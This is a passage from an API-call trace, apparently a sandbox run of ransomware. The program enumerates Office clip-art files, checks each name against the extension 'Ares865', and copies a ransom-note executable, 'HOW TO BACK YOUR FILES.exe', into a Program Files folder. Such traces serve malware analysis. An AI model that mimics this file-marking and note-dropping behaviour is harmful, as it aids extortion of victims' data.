lpString2="Ares865") returned -1 [0074.243] lstrcpyW (in: lpString1=0x2e2e8c6, lpString2="AN00965_.WMF" | out: lpString1="AN00965_.WMF") returned="AN00965_.WMF" [0074.243] lstrlenW (lpString="AN00965_.WMF") returned 12 [0074.243] lstrlenW (lpString="Ares865") returned 7 [0074.243] lstrcmpiW (lpString1="65_.WMF", lpString2="Ares865") returned -1 [0074.244] lstrcpyW (in: lpString1=0x2e2e8c6, lpString2="AN01039_.WMF" | out: lpString1="AN01039_.WMF") returned="AN01039_.WMF" [0074.244] lstrlenW (lpString="AN01039_.WMF") returned 12 [0074.244] lstrlenW (lpString="Ares865") returned 7 [0074.244] lstrcmpiW (lpString1="39_.WMF", lpString2="Ares865") returned -1 [0074.244] lstrcpyW (in: lpString1=0x2e2e8c6, lpString2="AN01044_.WMF" | out: lpString1="AN01044_.WMF") returned="AN01044_.WMF" [0074.244] lstrlenW (lpString="AN01044_.WMF") returned 12 [0074.244] lstrlenW (lpString="Ares865") returned 7 [0074.244] lstrcmpiW (lpString1="44_.WMF", lpString2="Ares865") returned -1 [0074.244] lstrcpyW (in: lpString1=0x2e2e8c6, lpString2="AN01060_.WMF" | out: lpString1="AN01060_.WMF") returned="AN01060_.WMF" [0074.244] lstrlenW (lpString="AN01060_.WMF") returned 12 [0074.244] lstrlenW (lpString="Ares865") returned 7 [0074.244] lstrcmpiW (lpString1="60_.WMF", lpString2="Ares865") returned -1 [0074.244] lstrcpyW (in: lpString1=0x2e2e8c6, lpString2="AN01084_.WMF" | out: lpString1="AN01084_.WMF") returned="AN01084_.WMF" [0074.244] lstrlenW (lpString="AN01084_.WMF") returned 12 [0074.244] lstrlenW (lpString="Ares865") returned 7 [0074.244] lstrcmpiW (lpString1="84_.WMF", lpString2="Ares865") returned -1 [0074.244] lstrcpyW (in: lpString1=0x2e2e8c6, lpString2="AN01173_.WMF" | out: lpString1="AN01173_.WMF") returned="AN01173_.WMF" [0074.244] lstrlenW (lpString="AN01173_.WMF") returned 12 [0074.244] lstrlenW (lpString="Ares865") returned 7 [0074.244] lstrcmpiW (lpString1="73_.WMF", lpString2="Ares865") returned -1 [0074.244] lstrcpyW (in: lpString1=0x2e2e8c6, lpString2="AN01174_.WMF" | out: lpString1="AN01174_.WMF") returned="AN01174_.WMF" [0074.244] lstrlenW (lpString="AN01174_.WMF") returned 12 [0074.244] lstrlenW (lpString="Ares865") returned 7 [0074.244] lstrcmpiW (lpString1="74_.WMF", lpString2="Ares865") returned -1 [0074.245] lstrcpyW (in: lpString1=0x2e2e8c6, lpString2="AN01184_.WMF" | out: lpString1="AN01184_.WMF") returned="AN01184_.WMF" [0074.245] lstrlenW (lpString="AN01184_.WMF") returned 12 [0074.245] lstrlenW (lpString="Ares865") returned 7 [0074.245] lstrcmpiW (lpString1="84_.WMF", lpString2="Ares865") returned -1 [0074.245] lstrcpyW (in: lpString1=0x2e2e8c6, lpString2="AN01216_.WMF" | out: lpString1="AN01216_.WMF") returned="AN01216_.WMF" [0074.245] lstrlenW (lpString="AN01216_.WMF") returned 12 [0074.245] lstrlenW (lpString="Ares865") returned 7 [0074.245] lstrcmpiW (lpString1="16_.WMF", lpString2="Ares865") returned -1 [0074.245] lstrcpyW (in: lpString1=0x2e2e8c6, lpString2="AN01218_.WMF" | out: lpString1="AN01218_.WMF") returned="AN01218_.WMF" [0074.245] lstrlenW (lpString="AN01218_.WMF") returned 12 [0074.245] lstrlenW (lpString="Ares865") returned 7 [0074.245] lstrcmpiW (lpString1="18_.WMF", lpString2="Ares865") returned -1 [0074.245] lstrcpyW (in: lpString1=0x2e2e8c6, lpString2="AN01251_.WMF" | out: lpString1="AN01251_.WMF") returned="AN01251_.WMF" [0074.245] lstrlenW (lpString="AN01251_.WMF") returned 12 [0074.245] lstrlenW (lpString="Ares865") returned 7 [0074.245] lstrcmpiW (lpString1="51_.WMF", lpString2="Ares865") returned -1 [0074.245] lstrcpyW (in: lpString1=0x2e2e8c6, lpString2="AN01545_.WMF" | out: lpString1="AN01545_.WMF") returned="AN01545_.WMF" [0074.245] lstrlenW (lpString="AN01545_.WMF") returned 12 [0074.245] lstrlenW (lpString="Ares865") returned 7 [0074.245] lstrcmpiW (lpString1="45_.WMF", lpString2="Ares865") returned -1 [0074.245] lstrcpyW (in: lpString1=0x2e2e8c6, lpString2="AN02122_.WMF" | out: lpString1="AN02122_.WMF") returned="AN02122_.WMF" [0074.245] lstrlenW (lpString="AN02122_.WMF") returned 12 [0074.245] lstrlenW (lpString="Ares865") returned 7 [0074.245] lstrcmpiW (lpString1="22_.WMF", lpString2="Ares865") returned -1 [0074.246] lstrcpyW (in: lpString1=0x2e2e8c6, lpString2="AN02559_.WMF" | out: lpString1="AN02559_.WMF") returned="AN02559_.WMF" [0074.246] lstrlenW (lpString="AN02559_.WMF") returned 12 [0074.246] lstrlenW (lpString="Ares865") returned 7 [0074.246] lstrcmpiW (lpString1="59_.WMF", lpString2="Ares865") returned -1 [0074.246] lstrcpyW (in: lpString1=0x2e2e8c6, lpString2="AN02724_.WMF" | out: lpString1="AN02724_.WMF") returned="AN02724_.WMF" [0074.246] lstrlenW (lpString="AN02724_.WMF") returned 12 [0074.246] lstrlenW (lpString="Ares865") returned 7 [0074.246] lstrcmpiW (lpString1="24_.WMF", lpString2="Ares865") returned -1 [0074.246] lstrcpyW (in: lpString1=0x2e2e8c6, lpString2="AN03500_.WMF" | out: lpString1="AN03500_.WMF") returned="AN03500_.WMF" [0074.246] lstrlenW (lpString="AN03500_.WMF") returned 12 [0074.246] lstrlenW (lpString="Ares865") returned 7 [0074.246] lstrcmpiW (lpString1="00_.WMF", lpString2="Ares865") returned -1 [0074.246] lstrcpyW (in: lpString1=0x2e2e8c6, lpString2="AN04108_.WMF" | out: lpString1="AN04108_.WMF") returned="AN04108_.WMF" [0074.246] lstrlenW (lpString="AN04108_.WMF") returned 12 [0074.246] lstrlenW (lpString="Ares865") returned 7 [0074.246] lstrcmpiW (lpString1="08_.WMF", lpString2="Ares865") returned -1 [0074.246] lstrcpyW (in: lpString1=0x2e2e8c6, lpString2="AN04117_.WMF" | out: lpString1="AN04117_.WMF") returned="AN04117_.WMF" [0074.246] lstrlenW (lpString="AN04117_.WMF") returned 12 [0074.246] lstrlenW (lpString="Ares865") returned 7 [0074.246] lstrcmpiW (lpString1="17_.WMF", lpString2="Ares865") returned -1 [0074.246] lstrcpyW (in: lpString1=0x2e2e8c6, lpString2="AN04134_.WMF" | out: lpString1="AN04134_.WMF") returned="AN04134_.WMF" [0074.246] lstrlenW (lpString="AN04134_.WMF") returned 12 [0074.247] lstrlenW (lpString="Ares865") returned 7 [0074.247] lstrcmpiW (lpString1="34_.WMF", lpString2="Ares865") returned -1 [0074.247] lstrcpyW (in: lpString1=0x2e2e8c6, lpString2="AN04174_.WMF" | out: lpString1="AN04174_.WMF") returned="AN04174_.WMF" [0074.247] lstrlenW (lpString="AN04174_.WMF") returned 12 [0074.247] lstrlenW (lpString="Ares865") returned 7 [0074.247] lstrcmpiW (lpString1="74_.WMF", lpString2="Ares865") returned -1 [0074.247] lstrcpyW (in: lpString1=0x2e2e8c6, lpString2="AN04191_.WMF" | out: lpString1="AN04191_.WMF") returned="AN04191_.WMF" [0074.247] lstrlenW (lpString="AN04191_.WMF") returned 12 [0074.247] lstrlenW (lpString="Ares865") returned 7 [0074.247] lstrcmpiW (lpString1="91_.WMF", lpString2="Ares865") returned -1 [0074.247] lstrcpyW (in: lpString1=0x2e2e8c6, lpString2="AN04195_.WMF" | out: lpString1="AN04195_.WMF") returned="AN04195_.WMF" [0074.247] lstrlenW (lpString="AN04195_.WMF") returned 12 [0074.247] lstrlenW (lpString="Ares865") returned 7 [0074.247] lstrcmpiW (lpString1="95_.WMF", lpString2="Ares865") returned -1 [0074.247] lstrcpyW (in: lpString1=0x2e2e8c6, lpString2="AN04196_.WMF" | out: lpString1="AN04196_.WMF") returned="AN04196_.WMF" [0074.247] lstrlenW (lpString="AN04196_.WMF") returned 12 [0074.247] lstrlenW (lpString="Ares865") returned 7 [0074.247] lstrcmpiW (lpString1="96_.WMF", lpString2="Ares865") returned -1 [0074.247] lstrcpyW (in: lpString1=0x2e2e8c6, lpString2="AN04206_.WMF" | out: lpString1="AN04206_.WMF") returned="AN04206_.WMF" [0074.247] lstrlenW (lpString="AN04206_.WMF") returned 12 [0074.247] lstrlenW (lpString="Ares865") returned 7 [0074.247] lstrcmpiW (lpString1="06_.WMF", lpString2="Ares865") returned -1 [0074.247] lstrcpyW (in: lpString1=0x2e2e8c6, lpString2="AN04225_.WMF" | out: lpString1="AN04225_.WMF") returned="AN04225_.WMF" [0074.247] lstrlenW (lpString="AN04225_.WMF") returned 12 [0074.248] lstrlenW (lpString="Ares865") returned 7 [0074.248] lstrcmpiW (lpString1="25_.WMF", lpString2="Ares865") returned -1 [0074.248] lstrcpyW (in: lpString1=0x2e2e8c6, lpString2="AN04235_.WMF" | out: lpString1="AN04235_.WMF") returned="AN04235_.WMF" [0074.248] lstrlenW (lpString="AN04235_.WMF") returned 12 [0074.248] lstrlenW (lpString="Ares865") returned 7 [0074.248] lstrcmpiW (lpString1="35_.WMF", lpString2="Ares865") returned -1 [0074.248] lstrcpyW (in: lpString1=0x2e2e8c6, lpString2="AN04267_.WMF" | out: lpString1="AN04267_.WMF") returned="AN04267_.WMF" [0074.248] lstrlenW (lpString="AN04267_.WMF") returned 12 [0074.248] lstrlenW (lpString="Ares865") returned 7 [0074.248] lstrcmpiW (lpString1="67_.WMF", lpString2="Ares865") returned -1 [0074.252] lstrcpyW (in: lpString1=0x2e2e8c6, lpString2="AN04269_.WMF" | out: lpString1="AN04269_.WMF") returned="AN04269_.WMF" [0074.252] lstrlenW (lpString="AN04269_.WMF") returned 12 [0074.253] lstrlenW (lpString="Ares865") returned 7 [0074.253] lstrcmpiW (lpString1="69_.WMF", lpString2="Ares865") returned -1 [0074.253] lstrcpyW (in: lpString1=0x2e2e8c6, lpString2="AN04323_.WMF" | out: lpString1="AN04323_.WMF") returned="AN04323_.WMF" [0074.254] lstrlenW (lpString="AN04323_.WMF") returned 12 [0074.254] lstrlenW (lpString="Ares865") returned 7 [0074.254] lstrcmpiW (lpString1="23_.WMF", lpString2="Ares865") returned -1 [0074.254] lstrcpyW (in: lpString1=0x2e2e8c6, lpString2="AN04326_.WMF" | out: lpString1="AN04326_.WMF") returned="AN04326_.WMF" [0074.254] lstrlenW (lpString="AN04326_.WMF") returned 12 [0074.254] lstrlenW (lpString="Ares865") returned 7 [0074.254] lstrcmpiW (lpString1="26_.WMF", lpString2="Ares865") returned -1 [0074.254] lstrcpyW (in: lpString1=0x2e2e8c6, lpString2="AN04332_.WMF" | out: lpString1="AN04332_.WMF") returned="AN04332_.WMF" [0074.254] lstrlenW (lpString="AN04332_.WMF") returned 12 [0074.254] lstrlenW (lpString="Ares865") returned 7 [0074.254] lstrcmpiW (lpString1="32_.WMF", lpString2="Ares865") returned -1 [0074.254] lstrcpyW (in: lpString1=0x2e2e8c6, lpString2="AN04355_.WMF" | out: lpString1="AN04355_.WMF") returned="AN04355_.WMF" [0074.254] lstrlenW (lpString="AN04355_.WMF") returned 12 [0074.254] lstrlenW (lpString="Ares865") returned 7 [0074.254] lstrcmpiW (lpString1="55_.WMF", lpString2="Ares865") returned -1 [0074.254] lstrcpyW (in: lpString1=0x2e2e8c6, lpString2="AN04369_.WMF" | out: lpString1="AN04369_.WMF") returned="AN04369_.WMF" [0074.254] lstrlenW (lpString="AN04369_.WMF") returned 12 [0074.254] lstrlenW (lpString="Ares865") returned 7 [0074.254] lstrcmpiW (lpString1="69_.WMF", lpString2="Ares865") returned -1 [0074.255] lstrcpyW (in: lpString1=0x2e2e8c6, lpString2="AN04384_.WMF" | out: lpString1="AN04384_.WMF") returned="AN04384_.WMF" [0074.255] lstrlenW (lpString="AN04384_.WMF") returned 12 [0074.255] lstrlenW (lpString="Ares865") returned 7 [0074.255] lstrcmpiW (lpString1="84_.WMF", lpString2="Ares865") returned -1 [0074.255] lstrcpyW (in: lpString1=0x2e2e8c6, lpString2="AN04385_.WMF" | out: lpString1="AN04385_.WMF") returned="AN04385_.WMF" [0074.255] lstrlenW (lpString="AN04385_.WMF") returned 12 [0074.255] lstrlenW (lpString="Ares865") returned 7 [0074.255] lstrcmpiW (lpString1="85_.WMF", lpString2="Ares865") returned -1 [0074.255] lstrcpyW (in: lpString1=0x2e2e8c6, lpString2="BABY_01.MID" | out: lpString1="BABY_01.MID") returned="BABY_01.MID" [0074.255] lstrlenW (lpString="BABY_01.MID") returned 11 [0074.255] lstrlenW (lpString="Ares865") returned 7 [0074.255] lstrcmpiW (lpString1="_01.MID", lpString2="Ares865") returned -1 [0074.255] lstrcpyW (in: lpString1=0x2e2e8c6, lpString2="BD00116_.WMF" | out: lpString1="BD00116_.WMF") returned="BD00116_.WMF" [0074.255] lstrlenW (lpString="BD00116_.WMF") returned 12 [0074.255] lstrlenW (lpString="Ares865") returned 7 [0074.255] lstrcmpiW (lpString1="16_.WMF", lpString2="Ares865") returned -1 [0074.255] lstrcpyW (in: lpString1=0x2e2e8c6, lpString2="BD00141_.WMF" | out: lpString1="BD00141_.WMF") returned="BD00141_.WMF" [0074.255] lstrlenW (lpString="BD00141_.WMF") returned 12 [0074.255] lstrlenW (lpString="Ares865") returned 7 [0074.255] lstrcmpiW (lpString1="41_.WMF", lpString2="Ares865") returned -1 [0074.255] lstrcpyW (in: lpString1=0x2e2e8c6, lpString2="BD00146_.WMF" | out: lpString1="BD00146_.WMF") returned="BD00146_.WMF" [0074.255] lstrlenW (lpString="BD00146_.WMF") returned 12 [0074.255] lstrlenW (lpString="Ares865") returned 7 [0074.255] lstrcmpiW (lpString1="46_.WMF", lpString2="Ares865") returned -1 [0074.256] lstrcpyW (in: lpString1=0x2e2e8c6, lpString2="BD00155_.WMF" | out: lpString1="BD00155_.WMF") returned="BD00155_.WMF" [0074.256] lstrlenW (lpString="BD00155_.WMF") returned 12 [0074.256] lstrlenW (lpString="Ares865") returned 7 [0074.256] lstrcmpiW (lpString1="55_.WMF", lpString2="Ares865") returned -1 [0074.256] lstrcpyW (in: lpString1=0x2e2e8c6, lpString2="BD00160_.WMF" | out: lpString1="BD00160_.WMF") returned="BD00160_.WMF" [0074.256] lstrlenW (lpString="BD00160_.WMF") returned 12 [0074.256] lstrlenW (lpString="Ares865") returned 7 [0074.256] lstrcmpiW (lpString1="60_.WMF", lpString2="Ares865") returned -1 [0074.256] lstrcpyW (in: lpString1=0x2e2e8c6, lpString2="BD00173_.WMF" | out: lpString1="BD00173_.WMF") returned="BD00173_.WMF" [0074.256] lstrlenW (lpString="BD00173_.WMF") returned 12 [0074.256] lstrlenW (lpString="Ares865") returned 7 [0074.256] lstrcmpiW (lpString1="73_.WMF", lpString2="Ares865") returned -1 [0074.256] lstrcpyW (in: lpString1=0x2e2e8c6, lpString2="BD05119_.WMF" | out: lpString1="BD05119_.WMF") returned="BD05119_.WMF" [0074.256] lstrlenW (lpString="BD05119_.WMF") returned 12 [0074.256] lstrlenW (lpString="Ares865") returned 7 [0074.256] lstrcmpiW (lpString1="19_.WMF", lpString2="Ares865") returned -1 [0074.256] lstrcpyW (in: lpString1=0x2e2e8c6, lpString2="BD06102_.WMF" | out: lpString1="BD06102_.WMF") returned="BD06102_.WMF" [0074.256] lstrlenW (lpString="BD06102_.WMF") returned 12 [0074.256] lstrlenW (lpString="Ares865") returned 7 [0074.256] lstrcmpiW (lpString1="02_.WMF", lpString2="Ares865") returned -1 [0074.256] lstrcpyW (in: lpString1=0x2e2e8c6, lpString2="BD06200_.WMF" | out: lpString1="BD06200_.WMF") returned="BD06200_.WMF" [0074.256] lstrlenW (lpString="BD06200_.WMF") returned 12 [0074.256] lstrlenW (lpString="Ares865") returned 7 [0074.256] lstrcmpiW (lpString1="00_.WMF", lpString2="Ares865") returned -1 [0074.257] lstrcpyW (in: lpString1=0x2e2e8c6, lpString2="BD07761_.WMF" | out: lpString1="BD07761_.WMF") returned="BD07761_.WMF" [0074.257] lstrlenW (lpString="BD07761_.WMF") returned 12 [0074.257] lstrlenW (lpString="Ares865") returned 7 [0074.257] lstrcmpiW (lpString1="61_.WMF", lpString2="Ares865") returned -1 [0074.257] lstrcpyW (in: lpString1=0x2e2e8c6, lpString2="BD07804_.WMF" | out: lpString1="BD07804_.WMF") returned="BD07804_.WMF" [0074.257] lstrlenW (lpString="BD07804_.WMF") returned 12 [0074.257] lstrlenW (lpString="Ares865") returned 7 [0074.257] lstrcmpiW (lpString1="04_.WMF", lpString2="Ares865") returned -1 [0074.257] lstrcpyW (in: lpString1=0x2e2e8c6, lpString2="BD07831_.WMF" | out: lpString1="BD07831_.WMF") returned="BD07831_.WMF" [0074.258] lstrlenW (lpString="BD07831_.WMF") returned 12 [0074.258] lstrlenW (lpString="Ares865") returned 7 [0074.258] lstrcmpiW (lpString1="31_.WMF", lpString2="Ares865") returned -1 [0074.258] lstrcpyW (in: lpString1=0x2e2e8c6, lpString2="BD08758_.WMF" | out: lpString1="BD08758_.WMF") returned="BD08758_.WMF" [0074.258] lstrlenW (lpString="BD08758_.WMF") returned 12 [0074.258] lstrlenW (lpString="Ares865") returned 7 [0074.258] lstrcmpiW (lpString1="58_.WMF", lpString2="Ares865") returned -1 [0074.258] lstrcpyW (in: lpString1=0x2e2e8c6, lpString2="BD08773_.WMF" | out: lpString1="BD08773_.WMF") returned="BD08773_.WMF" [0074.258] lstrlenW (lpString="BD08773_.WMF") returned 12 [0074.258] lstrlenW (lpString="Ares865") returned 7 [0074.258] lstrcmpiW (lpString1="73_.WMF", lpString2="Ares865") returned -1 [0074.258] lstrcpyW (in: lpString1=0x2e2e8c6, lpString2="BD08808_.WMF" | out: lpString1="BD08808_.WMF") returned="BD08808_.WMF" [0074.258] lstrlenW (lpString="BD08808_.WMF") returned 12 [0074.258] lstrlenW (lpString="Ares865") returned 7 [0074.258] lstrcmpiW (lpString1="08_.WMF", lpString2="Ares865") returned -1 [0074.258] lstrcpyW (in: lpString1=0x2e2e8c6, lpString2="BD08868_.WMF" | out: lpString1="BD08868_.WMF") returned="BD08868_.WMF" [0074.258] lstrlenW (lpString="BD08868_.WMF") returned 12 [0074.258] lstrlenW (lpString="Ares865") returned 7 [0074.258] lstrcmpiW (lpString1="68_.WMF", lpString2="Ares865") returned -1 [0074.259] lstrcpyW (in: lpString1=0x2e2e8c6, lpString2="BD09031_.WMF" | out: lpString1="BD09031_.WMF") returned="BD09031_.WMF" [0074.259] lstrlenW (lpString="BD09031_.WMF") returned 12 [0074.259] lstrlenW (lpString="Ares865") returned 7 [0074.259] lstrcmpiW (lpString1="31_.WMF", lpString2="Ares865") returned -1 [0074.259] lstrcpyW (in: lpString1=0x2e2e8c6, lpString2="BD09194_.WMF" | out: lpString1="BD09194_.WMF") returned="BD09194_.WMF" [0074.259] lstrlenW (lpString="BD09194_.WMF") returned 12 [0074.259] lstrlenW (lpString="Ares865") returned 7 [0074.259] lstrcmpiW (lpString1="94_.WMF", lpString2="Ares865") returned -1 [0074.259] lstrcpyW (in: lpString1=0x2e2e8c6, lpString2="BD09662_.WMF" | out: lpString1="BD09662_.WMF") returned="BD09662_.WMF" [0074.259] lstrlenW (lpString="BD09662_.WMF") returned 12 [0074.259] lstrlenW (lpString="Ares865") returned 7 [0074.259] lstrcmpiW (lpString1="62_.WMF", lpString2="Ares865") returned -1 [0074.259] lstrcpyW (in: lpString1=0x2e2e8c6, lpString2="BD09664_.WMF" | out: lpString1="BD09664_.WMF") returned="BD09664_.WMF" [0074.259] lstrlenW (lpString="BD09664_.WMF") returned 12 [0074.259] lstrlenW (lpString="Ares865") returned 7 [0074.259] lstrcmpiW (lpString1="64_.WMF", lpString2="Ares865") returned -1 [0074.259] lstrcpyW (in: lpString1=0x2e2e8c6, lpString2="BD10890_.GIF" | out: lpString1="BD10890_.GIF") returned="BD10890_.GIF" [0074.259] lstrlenW (lpString="BD10890_.GIF") returned 12 [0074.259] lstrlenW (lpString="Ares865") returned 7 [0074.259] lstrcmpiW (lpString1="90_.GIF", lpString2="Ares865") returned -1 [0074.259] lstrcpyW (in: lpString1=0x2e2e8c6, lpString2="BD10972_.GIF" | out: lpString1="BD10972_.GIF") returned="BD10972_.GIF" [0074.259] lstrlenW (lpString="BD10972_.GIF") returned 12 [0074.259] lstrlenW (lpString="Ares865") returned 7 [0074.259] lstrcmpiW (lpString1="72_.GIF", lpString2="Ares865") returned -1 [0074.260] lstrcpyW (in: lpString1=0x2e2e8c6, lpString2="BD19563_.GIF" | out: lpString1="BD19563_.GIF") returned="BD19563_.GIF" [0074.260] lstrlenW (lpString="BD19563_.GIF") returned 12 [0074.260] lstrlenW (lpString="Ares865") returned 7 [0074.260] lstrcmpiW (lpString1="63_.GIF", lpString2="Ares865") returned -1 [0074.260] lstrcpyW (in: lpString1=0x2e2e8c6, lpString2="BD19582_.GIF" | out: lpString1="BD19582_.GIF") returned="BD19582_.GIF" [0074.260] lstrlenW (lpString="BD19582_.GIF") returned 12 [0074.260] lstrlenW (lpString="Ares865") returned 7 [0074.260] lstrcmpiW (lpString1="82_.GIF", lpString2="Ares865") returned -1 [0074.260] lstrcpyW (in: lpString1=0x2e2e8c6, lpString2="BD19695_.WMF" | out: lpString1="BD19695_.WMF") returned="BD19695_.WMF" [0074.260] lstrlenW (lpString="BD19695_.WMF") returned 12 [0074.260] lstrlenW (lpString="Ares865") returned 7 [0074.260] lstrcmpiW (lpString1="95_.WMF", lpString2="Ares865") returned -1 [0074.261] lstrcpyW (in: lpString1=0x2e2e8c6, lpString2="BD19827_.WMF" | out: lpString1="BD19827_.WMF") returned="BD19827_.WMF" [0074.261] lstrlenW (lpString="BD19827_.WMF") returned 12 [0074.261] lstrlenW (lpString="Ares865") returned 7 [0074.261] lstrcmpiW (lpString1="27_.WMF", lpString2="Ares865") returned -1 [0074.261] lstrcpyW (in: lpString1=0x2e2e8c6, lpString2="BD19828_.WMF" | out: lpString1="BD19828_.WMF") returned="BD19828_.WMF" [0074.261] lstrlenW (lpString="BD19828_.WMF") returned 12 [0074.261] lstrlenW (lpString="Ares865") returned 7 [0074.261] lstrcmpiW (lpString1="28_.WMF", lpString2="Ares865") returned -1 [0074.262] lstrcpyW (in: lpString1=0x2e2e8c6, lpString2="BD19986_.WMF" | out: lpString1="BD19986_.WMF") returned="BD19986_.WMF" [0074.262] lstrlenW (lpString="BD19986_.WMF") returned 12 [0074.262] lstrlenW (lpString="Ares865") returned 7 [0074.262] lstrcmpiW (lpString1="86_.WMF", lpString2="Ares865") returned -1 [0074.262] lstrcpyW (in: lpString1=0x2e2e8c6, lpString2="BD19988_.WMF" | out: lpString1="BD19988_.WMF") returned="BD19988_.WMF" [0074.262] lstrlenW (lpString="BD19988_.WMF") returned 12 [0074.262] lstrlenW (lpString="Ares865") returned 7 [0074.262] lstrcmpiW (lpString1="88_.WMF", lpString2="Ares865") returned -1 [0074.262] lstrcpyW (in: lpString1=0x2e2e8c6, lpString2="BD20013_.WMF" | out: lpString1="BD20013_.WMF") returned="BD20013_.WMF" [0074.262] lstrlenW (lpString="BD20013_.WMF") returned 12 [0074.262] lstrlenW (lpString="Ares865") returned 7 [0074.262] lstrcmpiW (lpString1="13_.WMF", lpString2="Ares865") returned -1 [0074.262] lstrcpyW (in: lpString1=0x2e2e8c6, lpString2="BL00008_.WMF" | out: lpString1="BL00008_.WMF") returned="BL00008_.WMF" [0074.262] lstrlenW (lpString="BL00008_.WMF") returned 12 [0074.262] lstrlenW (lpString="Ares865") returned 7 [0074.262] lstrcmpiW (lpString1="08_.WMF", lpString2="Ares865") returned -1 [0074.262] lstrcpyW (in: lpString1=0x2e2e8c6, lpString2="BL00012_.WMF" | out: lpString1="BL00012_.WMF") returned="BL00012_.WMF" [0074.262] lstrlenW (lpString="BL00012_.WMF") returned 12 [0074.262] lstrlenW (lpString="Ares865") returned 7 [0074.262] lstrcmpiW (lpString1="12_.WMF", lpString2="Ares865") returned -1 [0074.262] lstrcpyW (in: lpString1=0x2e2e8c6, lpString2="BL00045_.WMF" | out: lpString1="BL00045_.WMF") returned="BL00045_.WMF" [0074.262] lstrlenW (lpString="BL00045_.WMF") returned 12 [0074.262] lstrlenW (lpString="Ares865") returned 7 [0074.263] lstrcmpiW (lpString1="45_.WMF", lpString2="Ares865") returned -1 [0074.263] lstrcpyW (in: lpString1=0x2e2e8c6, lpString2="BL00098_.WMF" | out: lpString1="BL00098_.WMF") returned="BL00098_.WMF" [0074.263] lstrlenW (lpString="BL00098_.WMF") returned 12 [0074.263] lstrlenW (lpString="Ares865") returned 7 [0074.263] lstrcmpiW (lpString1="98_.WMF", lpString2="Ares865") returned -1 [0074.263] lstrcpyW (in: lpString1=0x2e2e8c6, lpString2="BL00105_.WMF" | out: lpString1="BL00105_.WMF") returned="BL00105_.WMF" [0074.263] lstrlenW (lpString="BL00105_.WMF") returned 12 [0074.263] lstrlenW (lpString="Ares865") returned 7 [0074.263] lstrcmpiW (lpString1="05_.WMF", lpString2="Ares865") returned -1 [0074.263] lstrcpyW (in: lpString1=0x2e2e8c6, lpString2="BL00122_.WMF" | out: lpString1="BL00122_.WMF") returned="BL00122_.WMF" [0074.263] lstrlenW (lpString="BL00122_.WMF") returned 12 [0074.263] lstrlenW (lpString="Ares865") returned 7 [0074.263] lstrcmpiW (lpString1="22_.WMF", lpString2="Ares865") returned -1 [0074.263] lstrcpyW (in: lpString1=0x2e2e8c6, lpString2="BL00130_.WMF" | out: lpString1="BL00130_.WMF") returned="BL00130_.WMF" [0074.263] lstrlenW (lpString="BL00130_.WMF") returned 12 [0074.263] lstrlenW (lpString="Ares865") returned 7 [0074.263] lstrcmpiW (lpString1="30_.WMF", lpString2="Ares865") returned -1 [0074.263] lstrcpyW (in: lpString1=0x2e2e8c6, lpString2="BL00148_.WMF" | out: lpString1="BL00148_.WMF") returned="BL00148_.WMF" [0074.263] lstrlenW (lpString="BL00148_.WMF") returned 12 [0074.263] lstrlenW (lpString="Ares865") returned 7 [0074.263] lstrcmpiW (lpString1="48_.WMF", lpString2="Ares865") returned -1 [0074.263] lstrcpyW (in: lpString1=0x2e2e8c6, lpString2="BL00152_.WMF" | out: lpString1="BL00152_.WMF") returned="BL00152_.WMF" [0074.263] lstrlenW (lpString="BL00152_.WMF") returned 12 [0074.263] lstrlenW (lpString="Ares865") returned 7 [0074.264] lstrcmpiW (lpString1="52_.WMF", lpString2="Ares865") returned -1 [0074.264] lstrcpyW (in: lpString1=0x2e2e8c6, lpString2="BL00194_.WMF" | out: lpString1="BL00194_.WMF") returned="BL00194_.WMF" [0074.264] lstrlenW (lpString="BL00194_.WMF") returned 12 [0074.264] lstrlenW (lpString="Ares865") returned 7 [0074.264] lstrcmpiW (lpString1="94_.WMF", lpString2="Ares865") returned -1 [0074.264] lstrcpyW (in: lpString1=0x2e2e8c6, lpString2="BL00195_.WMF" | out: lpString1="BL00195_.WMF") returned="BL00195_.WMF" [0074.264] lstrlenW (lpString="BL00195_.WMF") returned 12 [0074.264] lstrlenW (lpString="Ares865") returned 7 [0074.264] lstrcmpiW (lpString1="95_.WMF", lpString2="Ares865") returned -1 [0074.264] lstrcpyW (in: lpString1=0x2e2e8c6, lpString2="BL00234_.WMF" | out: lpString1="BL00234_.WMF") returned="BL00234_.WMF" [0074.264] lstrlenW (lpString="BL00234_.WMF") returned 12 [0074.264] lstrlenW (lpString="Ares865") returned 7 [0074.264] lstrcmpiW (lpString1="34_.WMF", lpString2="Ares865") returned -1 [0074.536] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Microsoft Analysis Services", iMaxLength=260 | out: lpString1="C:\\Program Files\\Microsoft Analysis Services") returned="C:\\Program Files\\Microsoft Analysis Services" [0074.536] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f1fc8 | out: hHeap=0x2b0000) returned 1 [0074.536] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7c88 | out: hHeap=0x2b0000) returned 1 [0074.536] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services") returned 44 [0074.536] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Microsoft Analysis Services" | out: lpString1="C:\\Program Files\\Microsoft Analysis Services") returned="C:\\Program Files\\Microsoft Analysis Services" [0074.536] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0074.536] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Microsoft Analysis Services\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\microsoft analysis services\\how to back your files.exe"), bFailIfExists=1) returned 1 [0074.543] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0074.543] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Analysis Services\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfa1d4a90, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x5def1d00, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5def1d00, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0074.543] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR 